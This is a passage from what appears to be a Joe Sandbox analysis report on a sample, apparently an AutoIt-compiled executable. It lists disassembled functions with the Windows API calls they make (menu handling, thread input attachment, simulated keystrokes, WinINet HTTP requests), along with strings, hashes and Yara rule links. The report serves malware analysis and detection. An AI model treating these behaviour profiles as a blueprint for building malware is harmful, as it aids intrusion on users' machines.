Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 4ac313710d03adff532ea9e41e96507077347536d5ad7b03e5072371345dc921
Instruction ID: bbbc0acc88e2e69d1789eae54116aef7bc10f5fac25d6c84168142adee5899ab
Opcode Fuzzy Hash: 4ac313710d03adff532ea9e41e96507077347536d5ad7b03e5072371345dc921
Instruction Fuzzy Hash: B4318F35A006059FDB10EF68C488AAA7FF4FF45305F548066E805EB3A2EB71DD86CB90

Function 005A3C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 005A3C79
SetMenu.USER32(?,00000000), ref: 005A3C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005A3D10
IsMenu.USER32(?), ref: 005A3D24
CreatePopupMenu.USER32 ref: 005A3D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 005A3D5B
DrawMenuBar.USER32 ref: 005A3D63

Strings

F, xrefs: 005A3D4E
0, xrefs: 005A3C54

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 0d2f37f1e57237b641743da74e3f7dc7c0f261496fcb4c8271f0836d73c1a862
Instruction ID: 27a32d64678b2d3c73eb1829b21462897e1da032068909cd2280e2de5c407997
Opcode Fuzzy Hash: 0d2f37f1e57237b641743da74e3f7dc7c0f261496fcb4c8271f0836d73c1a862
Instruction Fuzzy Hash: 18416879A01209EFDB14CF64D884AAE7FB5FF5A354F140029F946A7360D730AA14DB94

Function 005A3A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 005A3A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 005A3AA0
GetWindowLongW.USER32(?,000000F0), ref: 005A3AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 005A3AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 005A3B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 005A3BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 005A3BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 005A3BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 005A3BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 005A3C13

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 6a121adec603426d56cb2149658e46ed74cc961d9af572a72530947eae12d603
Instruction ID: 54982ee2cc5b44355717b08d8d85a7a00505cbc00a454a5e6c79052ab5caf453
Opcode Fuzzy Hash: 6a121adec603426d56cb2149658e46ed74cc961d9af572a72530947eae12d603
Instruction Fuzzy Hash: D5615975900248AFDB10DFA8CC81EEE7BF8BF4A714F100099FA15AB291C770AE45DB60

Function 0057B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0057B151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,0057A1E1,?,00000001), ref: 0057B165
GetWindowThreadProcessId.USER32(00000000), ref: 0057B16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0057A1E1,?,00000001), ref: 0057B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0057B18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0057A1E1,?,00000001), ref: 0057B1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0057A1E1,?,00000001), ref: 0057B1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0057A1E1,?,00000001), ref: 0057B1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0057A1E1,?,00000001), ref: 0057B212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0057A1E1,?,00000001), ref: 0057B21D

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 15b1861ebdf8dcdd26e909d5e305a6190dc6f59cde9608180d4cd08a9552c0f0
Instruction ID: a050517342d5caed08633f028526d7c7b1b44c480fee28fff55d126ac75abfec
Opcode Fuzzy Hash: 15b1861ebdf8dcdd26e909d5e305a6190dc6f59cde9608180d4cd08a9552c0f0
Instruction Fuzzy Hash: 72318C75510208AFEB149F24EC8CB6D7FA9BB61311F108455FA09DB191E7B49E48AF60

Function 00542C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00542C94

Part of subcall function 005429C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000), ref: 005429DE
Part of subcall function 005429C8: GetLastError.KERNEL32(00000000,?,0054D7D1,00000000,00000000,00000000,00000000,?,0054D7F8,00000000,00000007,00000000,?,0054DBF5,00000000,00000000), ref: 005429F0

_free.LIBCMT ref: 00542CA0
_free.LIBCMT ref: 00542CAB
_free.LIBCMT ref: 00542CB6
_free.LIBCMT ref: 00542CC1
_free.LIBCMT ref: 00542CCC
_free.LIBCMT ref: 00542CD7
_free.LIBCMT ref: 00542CE2
_free.LIBCMT ref: 00542CED
_free.LIBCMT ref: 00542CFB

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: cb3ab96e268b8459a62f3b421e9f9936c1086efe2ad853fe3524ff0753285d84
Instruction ID: f2b647019b5027eac990fe8d3f060b4f816d861e06b3150a55d4c80a2b105c10
Opcode Fuzzy Hash: cb3ab96e268b8459a62f3b421e9f9936c1086efe2ad853fe3524ff0753285d84
Instruction Fuzzy Hash: DF11C076100119AFDB02EF95D886CDD3FB9FF45354F9144A0FA489B222DA31EE909B90

Function 00511410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00511459
OleUninitialize.OLE32(?,00000000), ref: 005114F8
UnregisterHotKey.USER32(?), ref: 005116DD
DestroyWindow.USER32(?), ref: 005524B9
FreeLibrary.KERNEL32(?), ref: 0055251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0055254B

Strings

close all, xrefs: 00511454

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 10d15447c7f98f54702417cc64a86ce5e6c53b4398fd31a80765e62a8daaaad7
Instruction ID: 6868d8ac1e200b6f10c86dff4f2ce615e05f25ca166e739ad64f0d328634d7ee
Opcode Fuzzy Hash: 10d15447c7f98f54702417cc64a86ce5e6c53b4398fd31a80765e62a8daaaad7
Instruction Fuzzy Hash: 4AD1BD31701622CFEB19EF14D4A8A69FFA4BF46700F1441EEE94A6B252DB30AC56CF54

Function 00515BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00515C7A

Part of subcall function 00515D0A: GetClientRect.USER32(?,?), ref: 00515D30
Part of subcall function 00515D0A: GetWindowRect.USER32(?,?), ref: 00515D71
Part of subcall function 00515D0A: ScreenToClient.USER32(?,?), ref: 00515D99

GetDC.USER32 ref: 005546F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00554708
SelectObject.GDI32(00000000,00000000), ref: 00554716
SelectObject.GDI32(00000000,00000000), ref: 0055472B
ReleaseDC.USER32(?,00000000), ref: 00554733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 005547C4

Strings

U, xrefs: 00554693

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 606f041d2381b20eb5b647d1b542239d452e97a4a0ec60724ef10875ce4f5126
Instruction ID: 6a7442baf897b7f100ead10c7b58d3ad4d9cbc5dbde225e092372e4ab66aa7f3
Opcode Fuzzy Hash: 606f041d2381b20eb5b647d1b542239d452e97a4a0ec60724ef10875ce4f5126
Instruction Fuzzy Hash: 1671DF34400205DFCF258F64C998AEA3FB5FF8A31AF14426AED555A266D7309CCADF50

Function 0058359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 005835E4

Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD

LoadStringW.USER32(005E2390,?,00000FFF,?), ref: 0058360A

Strings

^ ERROR, xrefs: 005836C9
"%s" (%d) : ==> %s:, xrefs: 00583742
Error: , xrefs: 005836EF
"%s" (%d) : ==> %s:%s%s, xrefs: 00583724
Line %d (File "%s"):, xrefs: 0058366B

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: f740b3057fc6fac08b1663d068b5317b56afb3e53c0ca98e25f1983bee0a3a34
Instruction ID: 01a258eaff1156b73ec1966dd901fbecae17bf0f3fcd8015bee7ecbafa8b6670
Opcode Fuzzy Hash: f740b3057fc6fac08b1663d068b5317b56afb3e53c0ca98e25f1983bee0a3a34
Instruction Fuzzy Hash: 0C516B7180020ABAEF14EBA0DC9AEEDBF38FF54700F144525F515721A1EB306B99DBA0

Function 0058C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0058C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0058C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0058C2CA
GetLastError.KERNEL32 ref: 0058C322
SetEvent.KERNEL32(?), ref: 0058C336
InternetCloseHandle.WININET(00000000), ref: 0058C341

Strings

, xrefs: 0058C2BB

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 98d7d3055c148619287e8690006587210a279fd393ab516df3775419a9338fdd
Instruction ID: 7790a83be29ec81c6077cf97ffaada539440bc72bc764fc059f9443af2f9ae57
Opcode Fuzzy Hash: 98d7d3055c148619287e8690006587210a279fd393ab516df3775419a9338fdd
Instruction Fuzzy Hash: 64317FB1500604AFD721AF649C88AAB7FFCFB59744F10891EF886A2240DB34DD099B70

Function 0057989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00553AAF,?,?,Bad directive syntax error,005ACC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 005798BC
LoadStringW.USER32(00000000,?,00553AAF,?), ref: 005798C3

Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00579987

Strings

Line %d:, xrefs: 00579912
%s (%d) : ==> %s.: %s %s, xrefs: 005798F1
Line %d (File "%s"):, xrefs: 0057992D
Error: , xrefs: 00579955
., xrefs: 0057996D

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: cf11680bd29c287107490eb45fe4780d5aca51db3f22cd620debb7e661b1d1b6
Instruction ID: 3543e181bf1943ab2dec9d3879c9b890ed7313b46a79ed3319eb8e9b89e6397c
Opcode Fuzzy Hash: cf11680bd29c287107490eb45fe4780d5aca51db3f22cd620debb7e661b1d1b6
Instruction Fuzzy Hash: 3D21943180021BBBDF11AF90DC5AEED7F75FF54300F044826F519620A1EB71AA58EB60

Function 0057209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 005720AB
GetClassNameW.USER32(00000000,?,00000100), ref: 005720C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0057214D

Strings

smallicons, xrefs: 00572115
largeicons, xrefs: 005720E1
SHELLDLL_DefView, xrefs: 005720CC
list, xrefs: 0057212F
details, xrefs: 005720FB

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: e8a184e5a12ad1e1daeace80f8dfb6591ca979f161a6249e322417ef7e8af23c
Instruction ID: e24e2ee8d6ef4f15f5b1a9a8917e5d0e8b7af0ecbfbba80c76c1da46cb71f507
Opcode Fuzzy Hash: e8a184e5a12ad1e1daeace80f8dfb6591ca979f161a6249e322417ef7e8af23c
Instruction Fuzzy Hash: 9C11597A288307BAF6116229FC0BDA63F9CFB15324F20401BFB09A50D1FE716841BA14

Function 0054CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0054CEB7
_free.LIBCMT ref: 0054CF22
_free.LIBCMT ref: 0054CF48
_free.LIBCMT ref: 0054CF71
_free.LIBCMT ref: 0054CFA9
_free.LIBCMT ref: 0054CFDA
_free.LIBCMT ref: 0054D01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0054D09C
_free.LIBCMT ref: 0054D0B5

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 35c5133244bc30a076be77cc1833b6e730a0e82258f093994e484aa6b43f7f69
Instruction ID: 0c4c8da63d30988a50988f37c33bf85e18892c3feaad86dce66b3f4f2a063d49
Opcode Fuzzy Hash: 35c5133244bc30a076be77cc1833b6e730a0e82258f093994e484aa6b43f7f69
Instruction Fuzzy Hash: FF618771905312BFDB25AFB49C89AEE7FA5FF81318F04016DF9449B282EB359C489760

Function 00528B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00566890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 005668A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 005668B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 005668D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 005668F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00528874,00000000,00000000,00000000,000000FF,00000000), ref: 00566901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0056691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00528874,00000000,00000000,00000000,000000FF,00000000), ref: 0056692D

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 66e45f2eea7abb2dca242a926c55c8933cb1b674fe93f8eb8f41bae400671fa7
Instruction ID: 5e0b6f25aa68993db56f952f6c905eec3b766dfcd013a009b4c7cdb023e2328e
Opcode Fuzzy Hash: 66e45f2eea7abb2dca242a926c55c8933cb1b674fe93f8eb8f41bae400671fa7
Instruction Fuzzy Hash: B2519570A00609AFDB20CF64DC95BAA3FB5FF9A710F104518F9529B2E0DB70E990EB40

Function 0058C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0058C182
GetLastError.KERNEL32 ref: 0058C195
SetEvent.KERNEL32(?), ref: 0058C1A9

Part of subcall function 0058C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0058C272
Part of subcall function 0058C253: GetLastError.KERNEL32 ref: 0058C322
Part of subcall function 0058C253: SetEvent.KERNEL32(?), ref: 0058C336
Part of subcall function 0058C253: InternetCloseHandle.WININET(00000000), ref: 0058C341

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: cfdfb2378b12210eccc5a6195d0abf4f229cbddccc759d77990079f3f2e33ecd
Instruction ID: ef4ebc6702325274392a1a6c707f3af78ee6a66c85632095370511702284238e
Opcode Fuzzy Hash: cfdfb2378b12210eccc5a6195d0abf4f229cbddccc759d77990079f3f2e33ecd
Instruction Fuzzy Hash: 46318075200601AFDB21AFB5DC48A66BFF9FF69300B00441DF997A2650DB31E814EB70

Function 005725A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00573A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00573A57
Part of subcall function 00573A3D: GetCurrentThreadId.KERNEL32 ref: 00573A5E
Part of subcall function 00573A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,005725B3), ref: 00573A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 005725BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 005725DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 005725DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 005725E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00572601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00572605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0057260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00572623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00572627

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: e960b58145b9f48b7a03b2e116e9c117e650d9a739f5235b9cb96ab3c7203277
Instruction ID: 6c4d37684ed6d9e3cd017629e0a6cd174e5f0399fcc14a979a4e7f699d898d2d
Opcode Fuzzy Hash: e960b58145b9f48b7a03b2e116e9c117e650d9a739f5235b9cb96ab3c7203277
Instruction Fuzzy Hash: 6E01D431390210BBFB1067699C8EF593F59EB9EB12F104001F318AF0D1C9E22449EA69

Function 00571803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00571449,?,?,00000000), ref: 0057180C
HeapAlloc.KERNEL32(00000000,?,00571449,?,?,00000000), ref: 00571813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00571449,?,?,00000000), ref: 00571828
GetCurrentProcess.KERNEL32(?,00000000,?,00571449,?,?,00000000), ref: 00571830
DuplicateHandle.KERNEL32(00000000,?,00571449,?,?,00000000), ref: 00571833
